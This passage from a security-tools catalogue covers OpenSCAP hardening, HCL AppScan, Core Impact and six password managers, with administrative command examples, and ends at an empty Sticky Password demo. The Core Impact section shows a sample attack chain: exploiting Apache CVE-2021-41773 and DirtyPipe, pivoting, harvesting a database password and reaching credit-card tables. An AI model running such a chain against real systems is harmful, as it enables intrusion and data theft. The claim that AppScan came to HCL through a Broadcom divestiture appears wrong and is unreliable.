--results-arf /tmp/remote_stig.xml \
--report /tmp/remote_stig_report.html \
/usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml
# ── STEP 4 Generate Ansible remediation playbook ────────────────────────────
sudo oscap xccdf generate fix \
--profile xccdf_org.ssgproject.content_profile_stig \
--fix-type ansible \
--output /tmp/stig_remediation.yml \
/tmp/stig_results.xml
# ── STEP 5 Apply remediation across all 12 servers ──────────────────────────
ansible-playbook \
-i /etc/ansible/hosts_production \
/tmp/stig_remediation.yml
# ── STEP 6 Re-scan all servers and generate ATO evidence package ────────────
for HOST in $(cat server_list.txt); do
oscap-ssh root@${HOST} 22 xccdf eval \
--profile xccdf_org.ssgproject.content_profile_stig \
--report /tmp/ato_evidence/${HOST}_post_remediation.html \
/usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml
done
Overview
IBM AppScan — now maintained and developed as HCL AppScan following Broadcom’s divestiture — is an enterprise application security testing platform providing SAST (Static Application Security Testing), DAST (Dynamic Application Security Testing), IAST (Interactive Application Security Testing), and SCA (Software Composition Analysis). AppScan addresses the complete application security testing lifecycle from IDE-integrated developer testing through CI/CD pipeline gates to production monitoring. The platform covers web applications, mobile applications, APIs, and microservices across Java, .NET, PHP, Python, Ruby, Swift, and JavaScript codebases.
HCL AppScan Enterprise (ASE) provides centralised governance for large application security programmes — managing thousands of applications, tracking security debt across the entire portfolio, enforcing pipeline security gates, and generating executive risk dashboards showing programme-wide trends. AppScan Standard (DAST) uses a Variant Analysis engine that correlates multiple low-confidence signals across scan results to confirm vulnerabilities that individual tests would miss as false positives — delivering higher accuracy than simpler scanner-first approaches. AppScan on Cloud provides zero-infrastructure SaaS DAST for teams without dedicated tooling infrastructure.
Key Features & Components
| Feature / Component | Description |
|---|---|
| AppScan Standard (DAST) | Active scanning engine with Variant Analysis correlation — confirms SQL injection, XSS, SSRF, XXE, and 100-plus other vulnerability classes with high accuracy and reduced false positives. |
| AppScan Source (SAST) | Static source code analysis for Java, .NET, PHP, Python, Ruby, Swift, and JavaScript — identifies vulnerabilities at the code level with exact file, line, and function references. |
| AppScan on Cloud (SaaS) | Zero-infrastructure cloud-delivered DAST — scan web applications and APIs from any location without managing scanner infrastructure. |
| API Security Testing | Imports Swagger/OpenAPI 3.0, WSDL, and Postman collections for comprehensive automated testing of REST, SOAP, and GraphQL API endpoint security. |
| Enterprise Governance (ASE) | Portfolio-wide application risk ratings, mandatory pre-release security gates, remediation tracking, trend reporting, and compliance posture for large application portfolios. |
| Framework and CMS Detection | Automatically identifies Django, Laravel, Spring, Rails, WordPress, Drupal, and other frameworks — applies targeted technology-specific checks and scanner configurations. |
Use Case Demonstration
# ── AppScan Enterprise API — scan management and pipeline gate ───────────────
# Step 1: Authenticate and obtain bearer token
TOKEN=$(curl -sk -X POST \
'https://appscan.corp.local/ase/api/v4.0.0/auth/login' \
-H 'Content-Type: application/json' \
-d '{"keyId":"API_KEY_ID","keySecret":"API_KEY_SECRET"}' \
| python3 -c "import sys,json;print(json.load(sys.stdin)['Token'])")
# Step 2: Create a DAST scan for the banking portal
SCAN_ID=$(curl -sk -X POST \
'https://appscan.corp.local/ase/api/v4.0.0/scans/dast' \
-H "Authorization: Bearer $TOKEN" \
-H 'Content-Type: application/json' \
-d '{
"name": "BankPortal_PreRelease_Build547",
"application_id":"APP-BANK-PORTAL-001",
"starting_url": "https://staging.bank.corp.internal/",
"login_user": "testuser@bank.com",
"login_password":"TestPass123",
"scan_type": "Staging"
}' | python3 -c "import sys,json;print(json.load(sys.stdin)['id'])")
# Step 3: Poll until finished (check every 60 seconds)
while true; do
STATUS=$(curl -sk \
"https://appscan.corp.local/ase/api/v4.0.0/scans/$SCAN_ID" \
-H "Authorization: Bearer $TOKEN" \
| python3 -c "import sys,json;print(json.load(sys.stdin)['status'])")
[ "$STATUS" = 'Finished' ] && break
sleep 60
done
# Step 4: Gate — fail pipeline if High or Critical issues exist
ISSUES=$(curl -sk \
"https://appscan.corp.local/ase/api/v4.0.0/issues?scan_id=$SCAN_ID&severity=high,critical" \
-H "Authorization: Bearer $TOKEN" \
| python3 -c "import sys,json;print(json.load(sys.stdin)['count'])")
echo "Open High/Critical Issues: $ISSUES"
[ $ISSUES -gt 0 ] && { echo 'DEPLOYMENT BLOCKED by AppScan gate'; exit 1; }
# Step 5: Generate PCI DSS 4.0 compliance report
curl -sk -X POST \
'https://appscan.corp.local/ase/api/v4.0.0/reports' \
-H "Authorization: Bearer $TOKEN" \
-d '{"scan_id":"'$SCAN_ID'","type":"PCI_DSS_4","format":"pdf"}'
Overview
Core Impact, developed by Core Security and now owned by Fortra (formerly HelpSystems), is a premium commercial penetration testing framework distinguished by its professionally curated, extensively tested exploit library and a guided workflow that automatically collects evidence throughout every attack step. Core Impact’s exploit modules are developed and validated by Core Security’s research team — each is tested for reliability, stability, and minimal target-system impact, making the framework suitable for use in production environments where community exploits (such as some Metasploit modules) pose unacceptable crash risk.
Core Impact’s Rapid Pen Test (RPT) wizard automates complete penetration testing workflows — network discovery, vulnerability fingerprinting, exploitation, privilege escalation, lateral movement, and pivoting — through a structured, guided interface that requires no command-line expertise. At every step, Core Impact automatically captures evidence: screenshots, session logs, command output, and exploitation timestamps. Upon completion, this evidence is automatically assembled into both executive and technical penetration test reports, dramatically reducing the post-engagement documentation burden. The framework also supports client-side (phishing), web application, and wireless penetration testing scenarios.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Certified Exploit Library | Every exploit professionally developed and regression-tested by Core Security researchers — reliable in production environments with minimal crash risk compared to community exploit code. |
| Rapid Pen Test (RPT) Wizard | Guided automated attack chain — network discovery, exploitation, privilege escalation, lateral movement, and pivoting — through a visual GUI with automatic evidence collection. |
| Automatic Evidence Collection | Every attack step is documented automatically: screenshots, session logs, privilege escalation evidence, and extracted data — assembled into a complete audit trail for the report. |
| Pivoting & Network Expansion | Deploys persistent agents on compromised hosts and automatically pivots through them to reach network segments not reachable from the tester’s machine. |
| Multi-Vector Campaign Support | Chains network exploitation, client-side phishing, and web application attacks into coordinated campaigns — simulating sophisticated multi-stage APT intrusion patterns. |
| Automated Report Generation | Produces professional executive summary and detailed technical reports with embedded evidence, CVE references, CVSS scores, and per-finding remediation recommendations. |
Use Case Demonstration
# ── Core Impact RPT workflow — representative console output ───────────────── # Phase 1: Network Information Gathering # Core Impact > RPT > Network > Target: 10.10.0.0/24 [RPT] Scanning 10.10.0.0/24 for live hosts... [RPT] Host: 10.10.0.50 OS: Windows Server 2019 Ports: 80, 443, 445, 3389 [RPT] Host: 10.10.0.100 OS: Ubuntu 22.04 Ports: 22, 80, 443 [RPT] Host: 10.10.0.200 OS: Windows Server 2022 Port: 1433 (MSSQL) # Phase 2: Network Attack and Penetration (automated exploit selection) [RPT] Fingerprinted: Apache 2.4.49 on 10.10.0.100 [RPT] Trying: CVE-2021-41773 Path Traversal / RCE [RPT] SUCCESS: Remote code execution on 10.10.0.100 [www-data] [RPT] Screenshot captured: Desktop_10.10.0.100_post_exploit.png # Phase 3: Privilege escalation on compromised Linux host [RPT] Trying local privilege escalation: CVE-2022-0847 (DirtyPipe) [RPT] SUCCESS: Root shell obtained on 10.10.0.100 [RPT] Evidence: uid=0(root) — captured in session log # Phase 4: Pivot to MSSQL tier (previously unreachable from tester) [RPT] Deploying pivot agent through 10.10.0.100... [RPT] Scanning 10.20.0.0/24 via pivot... [RPT] Host: 10.20.0.50 OS: Windows Server 2022 Port: 1433 open # Phase 5: Credential harvesting and lateral movement [RPT] Extracting credentials from 10.10.0.100 filesystem... [RPT] Found: /etc/app/config.ini -> db_user=sa_appuser db_pass=AppDB2024! [RPT] Connecting to MSSQL 10.20.0.50:1433 using harvested credential... [RPT] SUCCESS: MSSQL login confirmed — role: db_owner + server sysadmin [RPT] Tables accessible: customers (847,293 rows) orders credit_cards # Phase 6: Report generation # Core Impact > Reports > Technical + Executive Reports # Auto-populated from session logs, screenshots, and exploitation evidence [RPT] Report generated: CoreImpact_Assessment_2024-06-17.pdf
Section 2: Password Management
This section covers 10 password management tools (Tools 41–50), providing comprehensive technical analysis and practical use-case demonstrations for each product across the capability spectrum from open-source community solutions to commercial enterprise platforms.
Overview
LastPass is one of the world’s most widely deployed enterprise and consumer password managers, protecting credentials for more than 33 million users and 100,000 businesses. It uses AES-256 encryption with PBKDF2-SHA256 key derivation — increased to 600,000 iterations in 2023 following the public disclosure of a significant breach — and operates on a strict zero-knowledge model where all encryption and decryption operations occur client-side. LastPass servers store only AES-256 encrypted ciphertext that cannot be decrypted without the user’s master password, which is never transmitted.
LastPass Business provides a centralised Admin Console for policy enforcement, SSO integration via SAML 2.0, SCIM 2.0 user provisioning from Azure AD and Okta, MFA enforcement across all accounts, dark web monitoring for employee credentials, emergency access grants, and federated login — where employees authenticate to LastPass using their existing corporate identity provider without maintaining a separate master password. The Security Dashboard gives administrators organisation-wide visibility into password health — surfacing weak, reused, and compromised credentials across the entire user population for compliance documentation.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Zero-Knowledge Architecture | All encryption and decryption occur client-side — LastPass servers hold only AES-256 ciphertext that cannot be decrypted without the master password, which is never transmitted. |
| Security Dashboard | Organisation-wide password health: weak passwords, reused credentials, breached accounts, MFA adoption rate, and Security Score per employee — all exportable for compliance evidence. |
| Dark Web Monitoring | Continuously scans 30-plus billion records from breach databases and dark web sources — alerts employees within minutes when stored credentials appear in any known breach. |
| Federated Login (SSO) | Employees authenticate to LastPass using Azure AD, Okta, or any SAML 2.0 identity provider — no separate LastPass master password required for SSO-enrolled users. |
| SCIM 2.0 Provisioning | Automatic user lifecycle management from Azure AD, Okta, and OneLogin — provisioning and deprovisioning LastPass accounts as employees join or leave the organisation. |
| Emergency Access | Trusted contacts can request vault access after a configurable waiting period — enabling business continuity when the primary account holder is unavailable. |
Use Case Demonstration
# ── LastPass Business Admin API — user management and reporting ───────────────
# Authenticate to the Enterprise API
curl -X POST 'https://lastpass.com/enterpriseapi.php' \
-d 'cmd=getallusers&data={"cid":"COMPANY_ID",
"hash":"HMAC_SHA256_HASH","apiuser":"admin@corp.com"}'
# Bulk-enable MFA requirement for all staff
curl -X POST 'https://lastpass.com/enterpriseapi.php' \
-d 'cmd=setusergroups' \
-d 'data={"cid":"COMPANY_ID","hash":"HASH",
"users":[{"username":"user@corp.com",
"groups":["MFA_Enforced"]}]}'
# Disable departed employee accounts (offboarding)
curl -X POST 'https://lastpass.com/enterpriseapi.php' \
-d 'cmd=disableusers' \
-d 'data={"cid":"COMPANY_ID","hash":"HASH",
"users":["departed1@corp.com","departed2@corp.com"]}'
# Azure AD SCIM provisioning configuration
# Azure AD > Enterprise Applications > LastPass > Provisioning
# Tenant URL: https://api.lastpass.com/scim/v2
# Secret Token: [generated in LastPass Admin Console]
# Sync scope: Group 'All Employees'
# Attribute mapping:
# userPrincipalName -> userName
# displayName -> name
# department -> department
# Verify SCIM sync — count active LastPass users
curl -H 'Authorization: Bearer SCIM_TOKEN' \
'https://api.lastpass.com/scim/v2/Users?filter=active eq true' \
| python3 -c "import sys,json;d=json.load(sys.stdin);
print(f'Active LastPass accounts: {d[\"totalResults\"]}')"
# Export Security Dashboard report for compliance evidence (Admin Console)
# Admin Console > Reporting > Security Dashboard > Export CSV
# Columns: Employee | SecurityScore | WeakPasswords | ReusedPasswords
# | BreachedCredentials | MFAEnabled | LastActivity
Overview
Dashlane is a premium password manager serving over 18 million users, distinguished by real-time dark web monitoring with proactive employee alerts, a built-in VPN (Hotspot Shield, 256-bit AES), Password Health dashboard with organisation-wide visibility, a Confidential SSO architecture, and a superior user experience across Windows, macOS, iOS, Android, and all major browser extensions. Dashlane uses AES-256-GCM encryption with Argon2d key derivation and a strict zero-knowledge model independently validated through security audits.
Dashlane Business’s Confidential SSO feature is a notable architectural differentiator: unlike standard SSO-integrated password managers where the identity provider technically controls vault access, Dashlane’s confidential SSO uses patented cryptography ensuring that even Dashlane’s own infrastructure cannot access vault contents when SSO is configured. The Password Health dashboard is particularly useful for compliance auditing — it provides admin-accessible, per-employee metrics on weak, reused, and compromised password counts, exportable as a CSV for formal compliance documentation submissions to auditors, regulators, or internal governance processes.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Real-Time Dark Web Monitoring | Continuously monitors 20-plus billion records from breach databases and dark web sources — alerts employees within minutes of credential exposure in newly published breach datasets. |
| Password Health Dashboard | Organisation-wide visibility: weak, reused, and compromised password counts per employee with admin-controlled reporting for compliance and security programme evidence. |
| Confidential SSO | Patented SSO architecture where vault contents remain encrypted even from Dashlane’s infrastructure — provides stronger data privacy than standard SSO-integrated password managers. |
| Integrated VPN (Hotspot Shield) | Built-in 256-bit AES no-log VPN across 30-plus server locations with auto-connect on untrusted networks — no separate VPN subscription required under relevant plans. |
| Admin Activity Log | Comprehensive audit trail of all admin actions: policy changes, group modifications, SSO configuration, emergency access grants, and bulk operations — with timestamp and actor identity. |
| Passkey Support | Full FIDO2 passkey creation, storage, and authentication — forward-compatible with next-generation passwordless authentication standards across supported websites. |
Use Case Demonstration
# ── Dashlane Business Admin API — compliance evidence collection ──────────────
# Authenticate to the Dashlane Business API
curl -X POST 'https://api.dashlane.com/v1/business/authentication/token' \
-H 'Content-Type: application/json' \
-d '{"apikey":"BUSINESS_API_KEY"}'
# Query Password Health scores for all members
curl -H 'Authorization: Bearer TOKEN' \
'https://api.dashlane.com/v1/business/members/security-score' \
| python3 -c "
import sys, json
members = json.load(sys.stdin)['members']
print(f'Total members: {len(members)}')
below70 = [m for m in members
if m.get('password_health',{}).get('score',100) < 70]
print(f'Members below score 70 (action required): {len(below70)}')"
# Export Password Health CSV for HIPAA auditor
# Admin Console > Security > Password Health > Export Report (CSV)
# Columns: Member | Score | Weak | Reused | Compromised | MFAEnabled | LastSeen
# Force password reset for members with compromised credentials
curl -X POST 'https://api.dashlane.com/v1/business/members/require-reset' \
-H 'Authorization: Bearer TOKEN' \
-H 'Content-Type: application/json' \
-d '{"member_emails":["nurse1@hospital.com","tech2@hospital.com"]}'
# Configure SAML SSO with Okta
# Admin Console > Authentication > Single Sign-On
# Identity Provider: Okta
# Metadata URL: https://corp.okta.com/app/ABC123/sso/saml/metadata
# Attribute mapping: email -> email | displayName -> name
# Query admin activity log (last 30 days) for audit trail
curl -H 'Authorization: Bearer TOKEN' \
'https://api.dashlane.com/v1/business/audit-log?
from=2024-04-17&to=2024-05-17&limit=1000'
Overview
1Password is a highly regarded enterprise password manager trusted by more than 100,000 businesses including IBM, GitLab, Slack, and Shopify. Its foundational security innovation is the Secret Key — a 34-character, randomly generated key unique to each account, stored only on the user’s enrolled devices and never transmitted to 1Password servers. Vault encryption keys are derived by combining the master password with the Secret Key through PBKDF2. This two-factor key derivation means that a complete compromise of 1Password’s servers — containing only AES-256 encrypted ciphertext — yields nothing decryptable without both the master password and the device-resident Secret Key.
1Password Business provides Watchtower (continuous breach and vulnerability monitoring), Custom Groups, Advanced Protection policies (Travel Mode, device trust enforcement, clipboard auto-clear), 1Password Developer Tools (CLI, SSH agent, GitHub Actions secrets injection), and SIEM integration via the 1Password Events API. The 1Password CLI and Secrets Automation features make it the preferred choice for platform engineering and DevOps teams managing infrastructure credentials — replacing hardcoded secrets in .env files, CI/CD environment variables, Kubernetes Secrets, and application configuration files with secure, audited vault retrieval.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Secret Key Architecture | 34-character device-resident key combined with master password for AES-256 key derivation — a fully compromised 1Password server cannot decrypt any vault without the Secret Key. |
| Watchtower | Monitors saved credentials against HaveIBeenPwned, checks for weak passwords, flags vulnerable websites using CVE data, and alerts on expired 2FA seeds. |
| Travel Mode | Removes selected vaults from all devices during travel — any border inspection or coercive disclosure reveals only approved travel vaults; sensitive vaults restore upon safe arrival. |
| 1Password Developer Tools (CLI + SSH Agent) | CLI (op command), SSH agent integration for hardware-bound SSH keys, GitHub Actions secrets injection, and environment variable management for securing developer workflows. |
| Events API (SIEM Integration) | Streams sign-in attempts, vault changes, sharing events, and admin actions to Splunk, Elastic, Datadog, and other SIEM platforms for security monitoring and incident correlation. |
| Secrets Automation | Programmatic secret retrieval in CI/CD pipelines, Kubernetes deployments, Terraform runs, and application startups — eliminating hardcoded credentials from any configuration file. |
Use Case Demonstration
# ── 1Password CLI — DevOps secrets management ─────────────────────────────────
# Authenticate and start a session
op signin --account corp.1password.com
eval $(op signin)
# Store production database credentials as a Database vault item
op item create --category=Database \
--title='Production MySQL' \
--vault='DevOps Secrets' \
username=dbadmin \
"password=$(openssl rand -base64 32 | tr -d '\n')" \
hostname=mysql-prod.corp.internal \
port=3306
# Replace .env file with reference file (.env.template)
# DB_HOST=op://DevOps Secrets/Production MySQL/hostname
# DB_USER=op://DevOps Secrets/Production MySQL/username
# DB_PASS=op://DevOps Secrets/Production MySQL/password
# STRIPE_KEY=op://DevOps Secrets/Stripe API/api_key
# Inject secrets at runtime — never written to disk
op run --env-file=.env.template -- ./start_app.sh
# SSH agent integration (~/.config/1password/ssh/agent.toml)
[[ssh-keys]]
vault = "DevOps Secrets"
item = "Production Server SSH Key"
# Every SSH connection now authenticates via 1Password
# with biometric approval required on the developer's device
ssh admin@prod.corp.local
# GitHub Actions: inject 1Password secrets into the CI/CD workflow
# .github/workflows/deploy.yml:
- uses: 1password/load-secrets-action@v2
with:
export-env: true
env:
OP_SERVICE_ACCOUNT_TOKEN: ${{ secrets.OP_SERVICE_ACCOUNT_TOKEN }}
DATABASE_PASSWORD: op://DevOps/Production MySQL/password
AWS_SECRET_KEY: op://DevOps/AWS Production/secret_access_key
# Stream audit events to Splunk SIEM
curl -H 'Authorization: Bearer EVENTS_API_TOKEN' \
'https://events.1password.com/api/v1/auditevents?limit=100'
Overview
Bitwarden is the leading open-source password manager, distinguished by complete source transparency — client applications, server, browser extensions, desktop apps, and CLI are all published on GitHub. Bitwarden uses AES-256-CBC encryption with PBKDF2-SHA256 (600,000 iterations default) or Argon2id key derivation, and a strict zero-knowledge architecture. Organisations can self-host the complete Bitwarden server on their own infrastructure using Docker — keeping all vault data within their own network and complying with data residency, sovereignty, or regulatory requirements that prohibit cloud-hosted sensitive data.
Bitwarden’s self-hosting option makes it the preferred choice for regulated industries (government, healthcare, financial services) with strict data locality requirements, security-conscious organisations uncomfortable with cloud-hosted credential stores, and cost-sensitive teams needing enterprise features without enterprise pricing. The Bitwarden CLI (bw) provides full vault access for scripting and CI/CD integration. Bitwarden Send enables encrypted file and text sharing with configurable expiry dates, access counts, and password protection — providing a security-conscious alternative to sharing sensitive documents via email or unencrypted file shares.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Open Source & Independently Audited | Complete source code on GitHub; independently audited by Cure53 and Insight Risk Consulting — full transparency into every cryptographic mechanism and data handling decision. |
| Self-Hosting via Docker | Complete Bitwarden server deployable on-premises or private cloud — all vault data stays within the organisation’s own infrastructure; suitable for air-gapped environments. |
| Bitwarden CLI (bw) | Full vault management from the command line — create, update, retrieve, and delete items; inject secrets into CI/CD scripts; manage collections; and automate administrative tasks. |
| Bitwarden Send | Encrypted file (up to 500 MB) and text sharing with configurable expiry, maximum access counts, password protection, and automatic deletion — no third-party file transfer needed. |
| Directory Connector (BWDS) | Synchronises users and groups from Active Directory, Azure AD, Okta, G Suite, and any LDAP provider — with automated provisioning and deprovisioning via SCIM 2.0. |
| Passkey & FIDO2 Support | Creates, stores, and authenticates with FIDO2 passkeys — enabling passwordless login for supported websites and positioning vaults for next-generation authentication. |
Use Case Demonstration
# ── Bitwarden self-hosted Docker deployment ──────────────────────────────────── curl -Lso bitwarden.sh 'https://func.bitwarden.com/api/dl/?app=self-host&platform=linux' chmod +x bitwarden.sh sudo ./bitwarden.sh install # Prompts: domain = vault.corp.local | admin email = admin@corp.local sudo ./bitwarden.sh start # Starts: nginx, mssql, api, identity, admin, icons, events, sso containers # Verify all containers are running sudo docker compose -f /opt/bitwarden/docker/docker-compose.yml ps # ── Bitwarden CLI — automated credential rotation ───────────────────────────── # Authenticate with API key (non-interactive, suitable for automation) export BW_CLIENTID='user.CLIENT_ID' export BW_CLIENTSECRET='CLIENT_SECRET' bw login --apikey export BW_SESSION=$(bw unlock --passwordenv BW_PASSWORD --raw) # Find the service account item by name ITEM_ID=$(bw list items --search 'svc-db-prod' --session $BW_SESSION \ | python3 -c " import sys, json items = json.load(sys.stdin) print(items[0]['id'] if items else '')") # Generate a new strong password (32 characters) NEW_PASS=$(bw generate --length 32 \ --uppercase --lowercase --number --special \ --session $BW_SESSION) # Update the Bitwarden vault item bw get item $ITEM_ID --session $BW_SESSION \ | python3 -c " import sys, json item = json.load(sys.stdin) item['login']['password'] = '$NEW_PASS' print(json.dumps(item))" \ | bw encode | bw edit item $ITEM_ID --session $BW_SESSION # Rotate the corresponding Active Directory account password Set-ADAccountPassword -Identity svc-db-prod \ -NewPassword (ConvertTo-SecureString '$NEW_PASS' -AsPlainText -Force) \ -Reset
Overview
Keeper Security is an enterprise password manager and Privileged Access Management (PAM) platform built on a strict zero-knowledge architecture that uses PBKDF2-SHA256 with 1,000,000 iterations for key derivation and AES-256 for vault encryption. Each user’s vault record is encrypted individually with an AES key, and that key is itself encrypted with the user’s data key — which is derived from the master password. Sharing a record with another user encrypts only that record’s AES key with the recipient’s RSA public key, so compromising one user’s key exposes only their own records.
Keeper’s enterprise platform comprises four integrated products: Keeper Password Manager (vault), Keeper Secrets Manager (KSM — developer secrets injection SDK), KeeperPAM (Privileged Access Management with just-in-time access, session recording, and zero-trust infrastructure access), and BreachWatch (real-time dark web monitoring against 25-plus billion compromised records). KeeperPAM is particularly significant for regulated environments — it provides audited, time-limited access to production infrastructure through encrypted tunnels, where users authenticate to Keeper and receive just-in-time access without ever receiving or locally storing the actual infrastructure credential.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Zero-Knowledge Proof Architecture | Record-level AES encryption with RSA key wrapping per user — a compromised record for one user cannot expose any other user’s credentials; Keeper servers hold only ciphertext. |
| BreachWatch | Real-time continuous monitoring of 25-plus billion breach records — immediately alerts when any stored password appears in a known data breach dataset. |
| Keeper Secrets Manager (KSM) | Developer SDK for Python, Java, .NET, Go, JavaScript, and Ruby — securely inject secrets into CI/CD pipelines, Kubernetes clusters, Terraform configurations, and application startups. |
| KeeperPAM | Just-in-time privileged access, zero-trust remote infrastructure sessions, database session recording, and remote desktop tunnelling — without exposing actual credentials to the connecting user. |
| 150+ Role-Based Policy Controls | Granular enforcement: password complexity requirements, MFA mandatory settings, sharing restrictions, device trust requirements, session timeouts, and clipboard management controls. |
| Compliance Reporting | Automated SOC 2, ISO 27001, GDPR, HIPAA, and FedRAMP compliance reports with access audit trails, policy enforcement documentation, and remediation evidence. |
Use Case Demonstration
# ── Keeper Secrets Manager — Kubernetes External Secrets integration ──────────
# Install External Secrets Operator (ESO)
helm repo add external-secrets https://charts.external-secrets.io
helm install external-secrets external-secrets/external-secrets \
--namespace external-secrets --create-namespace
# Create a Kubernetes secret containing the KSM service account credentials
kubectl create secret generic keeper-credentials \
--from-literal=credentials='BASE64_KSM_CONFIG_JSON' \
-n production
# Create a ClusterSecretStore pointing to Keeper vault
kubectl apply -f - <<EOF
apiVersion: external-secrets.io/v1beta1
kind: ClusterSecretStore
metadata:
name: keeper-secret-store
spec:
provider:
keepersecurity:
authRef:
name: keeper-credentials
namespace: production
folderID: "KEEPER_FOLDER_UID"
EOF
# Map a Keeper vault record to a Kubernetes Secret
kubectl apply -f - <<EOF
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
name: production-db-credentials
namespace: production
spec:
refreshInterval: 1h
secretStoreRef:
name: keeper-secret-store
kind: ClusterSecretStore
target:
name: db-credentials
creationPolicy: Owner
data:
- secretKey: DB_PASSWORD
remoteRef:
key: "KEEPER_RECORD_UID"
property: password
- secretKey: DB_USER
remoteRef:
key: "KEEPER_RECORD_UID"
property: username
EOF
Overview
RoboForm is one of the longest-running password managers (launched in 1999), renowned for its industry-leading form-filling accuracy and flexible enterprise deployment model supporting both cloud-synced and fully on-premises server options. RoboForm uses AES-256 encryption with a master-password-derived key and a zero-knowledge model. Multi-factor authentication is supported via TOTP authenticator apps, FIDO2 hardware keys (YubiKey), and email-based verification. RoboForm Enterprise provides Active Directory integration via LDAP, SAML 2.0 SSO with Azure AD, Okta, and OneLogin, and a Security Center for admin-level visibility into organisational password hygiene.
RoboForm’s superior form-filling capability is its most operationally distinctive feature — it accurately completes complex multi-page web forms, AJAX-driven dynamic forms, government portals with non-standard field types, and insurance claim systems that simpler password managers fail to handle. RoboForm Identity Profiles store rich personal and professional information (name, addresses, tax IDs, licence numbers, insurance identifiers) that can be applied intelligently across any web form. For organisations whose employees spend significant time on regulatory submissions, insurance claims, or government portals, this form-filling accuracy translates directly into measurable productivity gains.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Advanced Multi-Page Form Filling | Accurately fills complex multi-page, AJAX-driven, and government portal forms with diverse field types — far beyond basic username-and-password autofill. |
| On-Premises Deployment Option | Full RoboForm server deployable within the organisation’s own data centre — vault data never leaves the network; suitable for air-gapped or strict data-locality environments. |
| Security Center | Admin dashboard: weak password counts, reused credentials, compromised accounts via breach scanning, MFA adoption rate, and per-user Security Score for compliance evidence. |
| LDAP / SAML SSO Integration | Active Directory LDAP sync for user provisioning; SAML 2.0 SSO with Azure AD, Okta, and OneLogin — employees use corporate identity credentials to authenticate. |
| Identity Profiles | Stores rich structured personal and professional data (name, addresses, NPI numbers, tax IDs, licence numbers) applicable across any web form for accurate auto-fill. |
| Emergency Access & Offline Mode | Trusted emergency contacts can access designated vault items after a configurable waiting period; full offline vault access without internet connectivity. |
Use Case Demonstration
# ── RoboForm Enterprise — silent deployment and policy enforcement ────────────
# Silent MSI installation via SCCM or Group Policy
msiexec /i RoboFormEnterprise.msi /quiet /norestart \
LICENSEKEY="XXXXX-XXXXX-XXXXX-XXXXX" \
SERVER_URL="https://vault.insurance-corp.local" \
FORCE_POLICY=1 \
INSTALL_BROWSER_EXTENSIONS=1
# ── Group Policy — password and MFA enforcement ───────────────────────────────
# Computer Config > Administrative Templates > RoboForm Enterprise
#
# Master Password Policy:
# Minimum length: 14 characters
# Uppercase: Required
# Numbers: Required
# Symbols: Required
# Maximum age: 90 days
# Minimum history: 12 previous passwords
#
# MFA: Require TOTP authenticator app (mandatory for all adjusters)
# Export vault data: DISABLED
# Share credentials outside org: DISABLED
# ── RoboForm Identity Profile — claims adjuster regulatory form ───────────────
# RoboForm > Identities > New Identity > 'Claims Adjuster Regulatory'
# Fields stored:
# First Name, Last Name, NPI Number, Adjuster License Number
# State License ID, Employer NPI, Employer Tax ID
# Email, Phone, Mailing Address, City, State, ZIP
# Claims Supervisor Name, Claims Supervisor Phone
# ── Admin API: Security Centre export for compliance audit ────────────────────
curl -X GET 'https://vault.insurance-corp.local/api/security/report' \
-H 'Authorization: Bearer ADMIN_TOKEN' \
-o security_report_$(date +%Y%m%d).csv
# Parse report for employees below Security Score threshold
python3 - << 'EOF'
import csv
with open('security_report_20240617.csv') as f:
reader = csv.DictReader(f)
low = [r for r in reader if int(r.get('SecurityScore','100')) < 60]
print(f'Employees requiring intervention: {len(low)}')
for r in low:
print(f' {r["Email"]} — Score: {r["SecurityScore"]}')
EOF
Overview
Sticky Password is a cross-platform password manager developed by the creators of AVG antivirus, featuring a unique Wi-Fi sync mode that synchronises vault data between a user’s devices exclusively over the local Wi-Fi network — with vault data never transmitted to any cloud server or third-party infrastructure. All synchronisation occurs device-to-device over the local network using end-to-end AES-256 encryption established through a secure pairing ceremony. This makes Sticky Password the only mainstream consumer password manager offering true on-device synchronisation with complete data sovereignty.
Sticky Password uses AES-256 encryption with PBKDF2-SHA256 key derivation and a zero-knowledge model — even in cloud sync mode, vault data is encrypted before leaving the device. The Wi-Fi sync mode eliminates the cloud entirely: the vault never leaves the local network under any circumstances. A portable USB version runs completely from a flash drive without requiring software installation, enabling use on shared or unmanaged computers in environments where installing software is prohibited. These characteristics make Sticky Password particularly attractive for law firms, clinical settings, privacy-conscious professionals, and environments with strict data residency requirements.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Wi-Fi Only Sync Mode | Synchronises vaults between a user’s devices exclusively over local Wi-Fi — vault data is never transmitted to any server; complete data sovereignty with no cloud dependency. |
| Portable USB Version | Complete Sticky Password installation on a USB drive — vault stored on the device, usable on any computer without software installation or administrator privileges. |
| Embedded Secure Browser | Built-in hardened browser for accessing sensitive websites in an environment isolated from the main system browser profile — fills credentials without main-browser exposure. |
| Biometric Authentication | Fingerprint and facial recognition on supported mobile and desktop hardware — alternative to master password entry for routine vault unlocking. |
| One-Click Login | Single-click or configurable keyboard-shortcut login to any saved website or application — reduces friction while maintaining strong, unique password discipline. |
| Encrypted Backup and Restore | Creates AES-256 encrypted vault backup files with a separate backup password — storable on NAS, USB, or any trusted location for disaster recovery. |
Use Case Demonstration
